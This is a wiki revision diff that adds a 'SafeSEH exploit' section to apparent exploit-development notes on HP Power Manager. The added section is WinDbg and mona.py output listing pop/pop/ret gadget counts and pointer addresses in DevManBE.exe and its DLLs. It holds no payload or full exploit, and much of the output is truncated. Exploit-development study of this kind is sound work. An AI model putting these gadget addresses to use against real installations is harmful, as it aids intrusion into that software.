exploiting:windows:hppowerman
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revision | |||
| exploiting:windows:hppowerman [2019/05/07 15:47] – ebaer | exploiting:windows:hppowerman [2019/05/07 15:48] (current) – ebaer | ||
|---|---|---|---|
| Line 543: | Line 543: | ||
| </ | </ | ||
| + | |||
| + | |||
| + | ====== SafeSEH exploit ====== | ||
| + | |||
| + | < | ||
| + | 0:005> .load pykd.pyd | ||
| + | 0:005> !py mona seh | ||
| + | Hold on... | ||
| + | [+] Command used: | ||
| + | !py mona.py seh | ||
| + | |||
| + | ---------- Mona command started on 2019-05-07 06:48:06 (v2.0, rev 585) ---------- | ||
| + | [+] Processing arguments and criteria | ||
| + | - Pointer access level : X | ||
| + | [+] Generating module info table, hang on... | ||
| + | - Processing modules | ||
| + | - Done. Let's rock 'n roll. | ||
| + | [+] Querying 3 modules | ||
| + | - Querying module MSVCP60.dll | ||
| + | - Querying module DevManBE.exe | ||
| + | - Querying module DCL.dll | ||
| + | [+] Setting pointer access level criteria to ' | ||
| + | New pointer access level : R | ||
| + | [+] Preparing output file ' | ||
| + | - (Re)setting logfile c: | ||
| + | [+] Writing results to c: | ||
| + | - Number of pointers of type 'add esp,8 # ret 0x04' : 2 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret 0x04' : 4 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x04' : 17 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret 0x04' : 111 | ||
| + | - Number of pointers of type 'pop ecx # pop ecx # ret ' : 39 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x08' : 13 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret 0x08' : 6 | ||
| + | - Number of pointers of type 'add esp,8 # ret 0x08' : 20 | ||
| + | - Number of pointers of type 'pop ecx # pop ecx # ret 0x04' : 2 | ||
| + | - Number of pointers of type 'call dword ptr ss: | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x20' : 4 | ||
| + | - Number of pointers of type 'pop esi # pop edi # ret ' : 1 | ||
| + | - Number of pointers of type 'pop ebx # pop ecx # ret 0x08' : 2 | ||
| + | - Number of pointers of type 'pop ebx # pop ebp # ret ' : 1 | ||
| + | - Number of pointers of type 'pop ebx # pop ecx # ret ' : 8 | ||
| + | - Number of pointers of type 'pop esi # pop ebp # ret 0x0c' : 4 | ||
| + | - Number of pointers of type 'pop ebx # pop ebp # ret 0x10' : 15 | ||
| + | - Number of pointers of type 'pop ebx # pop ecx # ret 0x04' : 6 | ||
| + | - Number of pointers of type 'call dword ptr ss: | ||
| + | - Number of pointers of type 'pop edi # pop ebp # ret 0x0c' : 1 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret 0x10' : 1 | ||
| + | - Number of pointers of type 'pop ebx # pop ebp # ret 0x0c' : 12 | ||
| + | - Number of pointers of type 'pop esi # pop ecx # ret ' : 10 | ||
| + | - Number of pointers of type 'pop ebp # pop ecx # ret 0x0c' : 1 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x10' : 4 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret 0x10' : 4 | ||
| + | - Number of pointers of type 'pop esi # pop edi # ret 0x04' : 1 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret ' : 27 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret ' : 23 | ||
| + | - Number of pointers of type 'pop esi # pop ebx # ret 0x0c' : 8 | ||
| + | - Number of pointers of type 'pop edi # pop esi # ret 0x0c' : 19 | ||
| + | - Number of pointers of type 'pop esi # pop ebp # ret ' : 10 | ||
| + | - Number of pointers of type 'pop edi # pop ebx # ret 0x04' : 1 | ||
| + | - Number of pointers of type 'pop ebx # pop edi # ret ' : 3 | ||
| + | - Number of pointers of type 'pop edi # pop ebx # ret ' : 2 | ||
| + | - Number of pointers of type 'pop esi # pop ebp # ret 0x20' : 3 | ||
| + | - Number of pointers of type 'pop ebx # pop ebp # ret 0x20' : 1 | ||
| + | - Number of pointers of type 'pop edi # pop ebp # ret ' : 6 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret ' : 12 | ||
| + | - Number of pointers of type 'pop esi # pop ecx # ret 0x04' : 4 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret 0x0c' : 1 | ||
| + | - Number of pointers of type 'pop ebp # pop ebx # ret 0x08' : 6 | ||
| + | - Number of pointers of type 'call dword ptr ss: | ||
| + | - Number of pointers of type 'pop ebx # pop esi # ret ' : 1 | ||
| + | - Number of pointers of type 'add esp,8 # ret ' : 42 | ||
| + | - Number of pointers of type 'add esp,4 # pop ebp # ret ' : 7 | ||
| + | - Number of pointers of type 'pop esi # pop ebp # ret 0x04' : 5 | ||
| + | [+] Results : | ||
| + | 0x1000672b | | ||
| + | 0x1000678d | | ||
| + | 0x0047001c | | ||
| + | 0x0047f13d | | ||
| + | 0x10002b0a | | ||
| + | 0x10002b64 | | ||
| + | 0x7608165a | | ||
| + | 0x7608573e | | ||
| + | 0x76085758 | | ||
| + | 0x760857cf | | ||
| + | 0x760857e9 | | ||
| + | 0x76085815 | | ||
| + | 0x76085cdd | | ||
| + | 0x76097a75 | | ||
| + | 0x76097aa5 | | ||
| + | 0x76097f2f | | ||
| + | 0x76097f60 | | ||
| + | 0x00444527 | | ||
| + | 0x00476b25 | | ||
| + | 0x004820d1 | | ||
| + | ... Please wait while I'm processing all remaining results and writing everything to file... | ||
| + | [+] Done. Only the first 20 pointers are shown here. For more pointers, open c: | ||
| + | Found a total of 476 pointers | ||
| + | |||
| + | [+] This mona.py action took 0: | ||
| + | |||
| + | </ | ||
exploiting/windows/hppowerman.1557236831.txt.gz · Last modified: 2019/05/07 15:47 by ebaer
